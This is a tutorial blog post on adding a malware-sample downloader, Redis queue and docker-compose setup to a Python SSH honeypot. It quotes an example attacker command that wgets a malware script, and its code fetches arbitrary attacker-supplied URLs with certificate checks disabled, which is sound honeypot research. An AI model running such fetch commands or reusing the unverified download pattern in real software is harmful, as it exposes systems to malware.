SSH honeypot, deployed in the wild, collecting and sharing data

How to build an SSH honeypot in Python and Docker - Part 2

14 Aug 2021 • 9 min read

Python and Docker network

In this blog post I'll be extending the SSH honeypot we built in Part 1 (see How to build an SSH honeypot in Python and Docker - Part 1) to download any files the honeypot receives. A great way to collect malware samples to analyse.

The main features we'll be adding to the new honeypot are:

  • A downloader - to download requested files from attackers
  • Docker-compose - to manage multiple Docker containers
  • Redis - to handle the download queue

Contents

Architecture

We need to adjust the architecture of our honeypot so the file download function can run separately from the main honeypot. Our main reason for separating these services is to protect the honeypot from a denial-of-service (DoS) attack if it gets flooded with download requests.

Now, by separating the honeypot and download services, we have a flaw. An attacker will notice immediately that their recently downloaded file isn't on the honeypot. But surely that defeats the point in building a convincing honeypot?

Well, our main goal is to collect malware samples. Once an attacker has sent malware to our honeypot, our goal has been achieved. Also, it may be that our honeypot is mainly attacked by bots that upload malware to the honeypot, execute the malware, then disconnect. Most of these bots probably won't notice if there's no response to their malware; they're playing a numbers game.

So, back to the honeypot's architecture. To split the honeypot and downloader into separate services we'll adopt a microservices architectures. We'll run the honeypot on one Docker container, the and the downloader in another container.

To manage our containers we'll user Docker compose: a tool for running multi-container applications on Docker. To manage the queue of URLs to download, we'll use Redis: an in-memory database (it's a bit like a Python dictionary).

Prerequisites

Just like in Part 1, we need to setup a requirements.txt file. We also need to create an environment file (.env) and a Docker Compose config file (docker-compose.yml).

Requirements.txt

First, we need to update our requirements.txt file to include the additional libraries we'll be using. We'll be using paramiko (as we did in Part 1), then we're adding Redis (an in-memory database to process our downloads queue) and requests (do retrieve remote files). So, the new requirements.txt file looks like this:

paramiko
redis
requests

 

Environment file

Next, we need to create an environment file, called .env. This is where we'll store details for the Redis database:

REDIS_HOST=ssh_honeypot_redis_db
REDIS_PORT=6379
REDIS_PASSWORD=password

 

Docker compose

As I mentioned, we'll use docker-compose to manage our Docker containers. In Part 1 of this tutorial we ran a single Docker container and used the docker command to build, start, and stop it. But, for our improved honeypot, we'll run our malware-collecting extension in a second Docker container. We'll also run Redis in its own container.

Docker compose uses YAML configuration files. So, let's create 3 containers (the honeypot, the downloader, and the Redis database) in our docker-compose.yml file:

version: '3.7'

services:
            
    ssh_honeypot:
        container_name: ssh_honeypot
        build:
          context: .
          dockerfile: Dockerfile
        image: basic_ssh_honeypot
        tty: true  
        command: python ssh_honeypot.py --port 2222
        volumes:
            - .:/usr/src/app
        env_file:
            - ./.env
        ports:
            - 2224:2222
        environment:
            - CHOKIDAR_USEPOLLING=true
            
    ssh_honeypot_downloader:
        container_name: ssh_honeypot_downloader
        build:
          context: .
          dockerfile: Dockerfile
        image: ssh_honeypot_downloader
        tty: true  
        command: python ssh_honeypot_downloader.py
        volumes:
            - .:/usr/src/app
        env_file:
            - ./.env
        environment:
            - CHOKIDAR_USEPOLLING=true
            
    ssh_honeypot_redis_db:
        container_name: ssh_honeypot_redis_db
        image: redis:6.0.7-alpine
        command: redis-server --requirepass password 
        env_file:
            - ./.env

As you can see, we've named our containers ssh_honeypot, ssh_honeypot_downloader, and ssh_honeypot_redis_db.

Detecting URLs

The first thing our improved honeypot needs to do is detect when an attacker tries to download a URL. An attacker will usually call the wget command to download a file (e.g. wget https://website.com/malware.sh). But, there are other ways to download files -- so relying on the wget command might not capture all file requests. So, we'll use regular expressions to pattern match URLs (e.g https://website.com/malware.sh and IP-based URLs (e.g. 127.0.0.1/malware.sh.

We'll add the function detect_url(command, client_ip) to the main SSH honeypot, in the file ssh_honeypot.py:

def detect_url(command, client_ip):
    regex = r"(?i)\b((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)))*\))+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()\[\]{};:'\".,<>?«»“”‘’]))"
    result = re.findall(regex, command)
    if result:
        for ar in result:
            for url in ar:
                if url != '':
                    logging.info('New URL detected ({}): '.format(client_ip, url))
                    r.lpush("download_queue", url)

    ip_regex = r"([0-9]+(?:\.[0-9]+){3}\/\S*)"
    ip_result = re.findall(ip_regex, command)
    if ip_result:
        for ip_url in ip_result:
            if ip_url != '':
                logging.info('New IP-based URL detected ({}): '.format(client_ip, ip_url))
                r.lpush("download_queue", ip_url)

We'll call detect_url(command, client_ip) from the function handle_cmd() that we created in Part 1 of this tutorial.

The downloader

Now to create the main downloader. This service will consist of 2 parts:

  1. Pop URLs from the Redis download queue
  2. Retrieve URL contents, store in a ZIP archive, then save to disk

Pop URL from queue

Popping URLs from the Redis download queue is fairly straightforward. We'll just run a while loop to check for new URLs in the queue every second:

while True:

    try:
        url_to_download = r.lpop("download_queue")
        if url_to_download:
            downloadURL(url_to_download)

    except Exception as err:
        print('*** Download URL failed: {}'.format(err))
        logging.info('*** Download URL failed: {}'.format(err))
        traceback.print_exc()

    sleep(1)

The variable url_to_download will be null if there's nothing in the URL queue. So, essentially, the loop won't do anything until there's a URL in the queue.

Download URL

Now to actually download files from the URL queue. We'll start this function by checking if the requested URL has been downloaded before (since there's no point in downloading a URL again). We use Redis hash for this.

if not r.hexists("checked_urls", url):

The Redis method hexists checks if the given field (url) exists in the hash checked_urls. The first time we check a URL it won't be in the hash, so we move on to the next stage.

To download a URL, we'll use Python's requests library:

response = requests.get(url, verify=False, timeout=10)

Putting the download_url function together looks like this:

def downloadURL(url):

    # make sure we haven't already checked this URL
    if not r.hexists("checked_urls", url):

        a = urlparse(url)   
        file_name = os.path.basename(a.path)
        logging.info('Downloading URL: '.format(url))
        m_sha256 = hashlib.sha256()
        file_digest = ''
        chunks = []

        try:
            response = requests.get(url, verify=False, timeout=10)

            if response.status_code == 200:
                for data in response.iter_content(8192):
                    m_sha256.update(data)
                    chunks.append(data)

                file_digest = m_sha256.hexdigest()
                directory = "uploaded_files"
                if not os.path.exists(directory):
                    os.makedirs(directory)

                zip_filename = directory+"/"+file_digest+'.zip'

                if not os.path.isfile(zip_filename):
                    file_contents = b''.join(chunks)
                    with zipfile.ZipFile(zip_filename, mode='w') as myzip:
                        myzip.writestr(file_name, file_contents)
                    
            else:
                print("Did not receive http 200 for requested URL. Received: ", response.status_code)
                logging.info('Did not receive http 200 for requested URL. Received {}'.format(response.status_code))

        except Exception as err:
            print('*** Download URL failed: {}'.format(err))
            logging.info('*** Download URL failed: {}'.format(err))
            traceback.print_exc()

        # add url to redis set so we don't check it again (prevents honeypot from becoming a DoS weapon)
        r.hset("checked_urls", url, file_digest)

We're using Python's hashlib library to calculate the URL's SHA-256 digest (hashlib.sha256()). We then add the file to a ZIP archive, and save the file as [SHA-256].zip into the directory uploaded_files.

The finished Python file

So, the complete Python file for our downloader (ssh_honeypot_downloader.py) is:

#!/usr/bin/env python
import sys
import os
import traceback
import paramiko
import logging
import redis
import requests
import urllib3
import hashlib
import zipfile
from time import sleep
from urllib.parse import urlparse

logging.basicConfig(
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    level=logging.INFO,
    filename='ssh_honeypot_downloader.log')

# disable InsecureRequestWarnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

REDIS_HOST=os.environ.get("REDIS_HOST")
REDIS_PORT=os.environ.get("REDIS_PORT")
REDIS_PASSWORD=os.environ.get("REDIS_PASSWORD")
r = redis.StrictRedis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, decode_responses=True)

def downloadURL(url):

    # make sure we haven't already checked this URL
    if not r.hexists("checked_urls", url):

        a = urlparse(url)   
        file_name = os.path.basename(a.path)
        logging.info('Downloading URL: '.format(url))
        m_sha256 = hashlib.sha256()
        file_digest = ''
        chunks = []

        try:
            response = requests.get(url, verify=False, timeout=10)

            if response.status_code == 200:
                for data in response.iter_content(8192):
                    m_sha256.update(data)
                    chunks.append(data)

                file_digest = m_sha256.hexdigest()
                directory = "uploaded_files"
                if not os.path.exists(directory):
                    os.makedirs(directory)

                zip_filename = directory+"/"+file_digest+'.zip'

                if not os.path.isfile(zip_filename):
                    file_contents = b''.join(chunks)
                    with zipfile.ZipFile(zip_filename, mode='w') as myzip:
                        myzip.writestr(file_name, file_contents)
                    
            else:
                print("Did not receive http 200 for requested URL. Received: ", response.status_code)
                logging.info('Did not receive http 200 for requested URL. Received {}'.format(response.status_code))

        except Exception as err:
            print('*** Download URL failed: {}'.format(err))
            logging.info('*** Download URL failed: {}'.format(err))
            traceback.print_exc()

        # add url to redis set so we don't check it again (prevents honeypot from becoming a DoS weapon)
        r.hset("checked_urls", url, file_digest)

print("Waiting for URL to download...")
while True:

    try:
        url_to_download = r.lpop("download_queue")
        if url_to_download:
            downloadURL(url_to_download)

    except Exception as err:
        print('*** Download URL failed: {}'.format(err))
        logging.info('*** Download URL failed: {}'.format(err))
        traceback.print_exc()

    sleep(1)

 

Running the honeypot

We've now finished adding the downloader to our SSH honeypot. There are two things we need to do before we can run the honeypot (these are the same from Part 1 -- so I'm going to presume you've done them):

  • Port forwarding (e.g. port 22 to 2222 -- for improved security)
  • Generate server's key

So, with port forwarding and the server's key setup, the honeypot's directory should contain these files:

  • .env
  • docker-compose.yml
  • Dockerfile
  • requirements.txt
  • server.key
  • public.pub
  • ssh_honeypot.py
  • ssh_honeypot_downloader.py

Once you've checked all those files are in place, go ahead and build the docker images with:

docker-compose build

Then, run the honeypot with:

docker-compose up

Just like in Part 1, you can connect to the honeypot to test everything's working properly with:

ssh test@[honeypot-ip]

Your test connection should appear in the log file ssh_honeypot.log.

Collecting malware samples

Any files uploaded to the honeypot will go in the directory uploaded_files. But, how do we know if these files are malicious? Well, we can presume any files uploaded to the honeypot are likely to be dangerous (due to the nature of users connecting to SSH honeypots).

You can check a file's SHA-256 digest on VirusTotal. The digest is the filename (minus the extension .zip). However, bear in mind, many antivirus vendors can't detect certain cryptomining malware for various reasons (e.g legitimate miners are used).

GitHub repo

All the files for this SSH honeypot are available on my GitHub repo at: github.com/sjbell/basic_ssh_honeypot_with_downloader.

Main image credit: A bundle of optical fibers. by Denny Muller. Logos for Python and Docker.

About the author

Simon BellSimon Bell is an award-winning Cyber Security Researcher, Software Engineer, and Web Security Specialist. Simon's research papers have been published internationally, and his findings have featured in Ars Technica, The Hacker News, PC World, among others. He founded Secure Honey, an open-source honeypot and threat intelligence project, in 2013. He has a PhD in Cyber Security from Royal Holloway's world-leading Information Security Group.

Follow Simon on Twitter: @SimonByte